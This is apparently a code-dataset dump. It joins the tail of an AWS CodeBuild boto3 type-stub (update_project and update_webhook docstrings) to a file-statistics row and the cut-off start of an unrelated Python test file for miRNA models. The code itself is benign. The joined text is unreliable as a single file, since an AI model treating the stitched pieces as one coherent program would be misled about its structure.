If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
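Taken together, ``location`` , ``path`` , ``namespaceType`` , and ``name`` determine where the artifact lands. For example, a hedged sketch of an ``artifacts`` value that stores ``MyArtifact.zip`` in a per-build folder (the bucket name is hypothetical)::
{
'type': 'S3',
'location': 'my-output-bucket',
'path': 'MyArtifacts',
'namespaceType': 'BUILD_ID',
'name': 'MyArtifact.zip',
'packaging': 'ZIP'
}
This stores the artifact at ``my-output-bucket/MyArtifacts/*build-ID* /MyArtifact.zip`` .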
:type secondaryArtifacts: list
:param secondaryArtifacts:
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates a folder in the output bucket that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates a ZIP file in the output bucket that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type cache: dict
:param cache:
Stores recently used information so that it can be quickly accessed at a later time.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads from and writes to Amazon S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to either of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
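For example, a hedged sketch of a ``cache`` value that combines two local cache modes (``location`` is omitted because it is ignored for ``LOCAL`` caches)::
{
'type': 'LOCAL',
'modes': ['LOCAL_SOURCE_CACHE', 'LOCAL_DOCKER_LAYER_CACHE']
}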
:type environment: dict
:param environment:
Information to be changed about the build environment for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build environment to use for related builds.
- **image** *(string) --* **[REQUIRED]**
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag \"latest,\" use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest \"sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf,\" use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --* **[REQUIRED]**
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system\'s base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c \"until docker info; do echo .; sleep 1; done\"``
If the operating system\'s base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c \"until docker info; do echo .; sleep 1; done\"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The only valid value, ``SECRETS_MANAGER`` , is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild\'s service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project\'s service role.
When you use a cross-account or private registry image, you must use ``SERVICE_ROLE`` credentials. When you use an AWS CodeBuild curated image, you must use ``CODEBUILD`` credentials.
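For example, a hedged sketch of an ``environment`` value that pulls an image from a private registry using the project's service role (the image name and Secrets Manager ARN are hypothetical)::
{
'type': 'LINUX_CONTAINER',
'image': 'my-registry.example.com/my-image:latest',
'computeType': 'BUILD_GENERAL1_MEDIUM',
'registryCredential': {
'credential': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:docker-creds',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'SERVICE_ROLE'
}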
:type serviceRole: string
:param serviceRole:
The replacement ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
:type timeoutInMinutes: integer
:param timeoutInMinutes:
The replacement value in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed.
:type queuedTimeoutInMinutes: integer
:param queuedTimeoutInMinutes:
The number of minutes a build is allowed to be queued before it times out.
:type encryptionKey: string
:param encryptionKey:
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK\'s alias (using the format ``alias/*alias-name* `` ).
:type tags: list
:param tags:
The replacement set of tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag\'s key.
- **value** *(string) --*
The tag\'s value.
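For example, a hedged sketch of a ``tags`` value (the keys and values are hypothetical)::
[
{'key': 'team', 'value': 'build'},
{'key': 'stage', 'value': 'prod'}
]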
:type vpcConfig: dict
:param vpcConfig:
VpcConfig enables AWS CodeBuild to access resources in an Amazon VPC.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
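For example, a hedged sketch of a ``vpcConfig`` value (all IDs are hypothetical)::
{
'vpcId': 'vpc-0123456789abcdef0',
'subnets': ['subnet-0123456789abcdef0'],
'securityGroupIds': ['sg-0123456789abcdef0']
}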
:type badgeEnabled: boolean
:param badgeEnabled:
Set this to true to generate a publicly accessible URL for your project\'s build badge.
:type logsConfig: dict
:param logsConfig:
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, logs in an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
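**Example** (a hedged, minimal sketch; the project name, image, and log bucket are hypothetical)::
response = client.update_project(
name='my-project',
environment={
'type': 'LINUX_CONTAINER',
'image': 'aws/codebuild/standard:2.0',
'computeType': 'BUILD_GENERAL1_SMALL'
},
logsConfig={
's3Logs': {
'status': 'ENABLED',
'location': 'my-bucket/build-log'
}
}
)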
:rtype: dict
:returns:
"""
pass
def update_webhook(self, projectName: str, branchFilter: str = None, rotateSecret: bool = None, filterGroups: List = None) -> Dict:
"""
Updates the webhook associated with an AWS CodeBuild build project.
.. note::
If you use Bitbucket for your repository, ``rotateSecret`` is ignored.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/UpdateWebhook>`_
**Request Syntax**
::
response = client.update_webhook(
projectName='string',
branchFilter='string',
rotateSecret=True|False,
filterGroups=[
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
]
)
**Response Syntax**
::
{
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
Information about a repository's webhook that is associated with a project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type branchFilter: string
:param branchFilter:
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
:type rotateSecret: boolean
:param rotateSecret:
A boolean value that specifies whether the associated GitHub repository\'s secret token should be updated. If you use Bitbucket for your repository, ``rotateSecret`` is ignored.
:type filterGroups: list
:param filterGroups:
An array of arrays of ``WebhookFilter`` objects used to determine if a webhook event can trigger a build. A filter group must contain at least one ``EVENT`` ``WebhookFilter`` .
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --* **[REQUIRED]**
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --* **[REQUIRED]**
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
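For example, a hedged sketch that triggers builds only for pull requests whose base branch is ``master`` (the project name is hypothetical)::
response = client.update_webhook(
projectName='my-project',
filterGroups=[
[
{'type': 'EVENT', 'pattern': 'PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED'},
{'type': 'BASE_REF', 'pattern': '^refs/heads/master$'}
]
]
)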
:rtype: dict
:returns:
"""
pass
| 82.720158 | 1,023 | 0.57753 | 50,002 | 438,665 | 5.047258 | 0.017879 | 0.019717 | 0.009985 | 0.007846 | 0.958522 | 0.951766 | 0.948933 | 0.94562 | 0.943603 | 0.942803 | 0 | 0.006089 | 0.335422 | 438,665 | 5,302 | 1,024 | 82.73576 | 0.859605 | 0.895029 | 0 | 0.425926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.425926 | false | 0.425926 | 0.148148 | 0 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
2a25521c26f6bf434e68407cefffbd3ebc3b7e0f | 24,133 | py | Python | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 1 | 2022-02-05T11:01:17.000Z | 2022-02-05T11:01:17.000Z | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 11 | 2020-01-28T22:16:38.000Z | 2022-02-10T00:34:28.000Z | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 2 | 2020-01-23T21:52:12.000Z | 2020-02-24T16:43:52.000Z | import numpy as np
import pandas as pd
from scipy import stats
import tensorflow as tf
import models
def sigmoid(vals):
return 1 / (1 + np.exp(-1 * vals))
def calc_r2(xs, ys):
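# linregress returns (slope, intercept, rvalue, pvalue, stderr); index 2 is
# the correlation coefficient r, squared here to give R^2.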
return stats.linregress(xs, ys)[2]**2
tf.logging.set_verbosity(tf.logging.DEBUG)
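# Each test below follows the same recipe: synthesize features and labels from
# known "true" parameters, fit the corresponding model, then print how far the
# recovered parameters drift from the true ones, along with the label R^2.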
def test_linear_model(num_genes, num_mirs, num_max_sites, num_features, maxiter):
# generate random data
np.random.seed(0)
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights = (np.arange(num_features) + 1.0).reshape([1, 1, 1, -1])
true_weights = (true_weights - np.mean(true_weights)) / np.std(true_weights)
labels = np.sum(np.multiply(np.sum(np.multiply(features, true_weights), axis=3), mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.LinearModel(num_features)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs'] - true_weights))))
print('Label r2: {}'.format(model.r2))
def test_boundedlinear_model(num_genes, num_mirs, num_max_sites, num_features, maxiter):
# generate random data
np.random.seed(0)
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features) - 0.5
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
bounds = np.full([num_genes, num_mirs, num_max_sites, 1], -0.03)
features_plus_bounds = np.concatenate([features, bounds], axis=3)
true_weights = (np.arange(num_features) + 1.0).reshape([1, 1, 1, -1])
true_weights = (true_weights - np.mean(true_weights)) / np.std(true_weights)
weighted = np.sum(np.multiply(features, true_weights), axis=3)
bounded = np.minimum(weighted, np.squeeze(bounds))
labels = np.sum(np.multiply(weighted, mask), axis=2)
labels_bounded = np.sum(np.multiply(bounded, mask), axis=2)
print(features_plus_bounds.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features_plus_bounds,
mask_tensor: mask,
labels_tensor: labels
}
model = models.BoundedLinearModel(num_features)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs'] - true_weights))))
print('Label r2: {}'.format(model.r2))
bounded_pred = model.predict(sess, data, feed_dict)
print(calc_r2(labels_bounded.flatten(), bounded_pred.flatten()))
def test_sigmoid_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_bias1 = -1
true_decay = 1.5
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_bias1)
weighted2 = np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3)
weighted = weighted1 + weighted2
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.SigmoidModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True bias1 diff: {}'.format(np.abs(model.vars_evals['bias1'] - true_bias1)))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoid_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
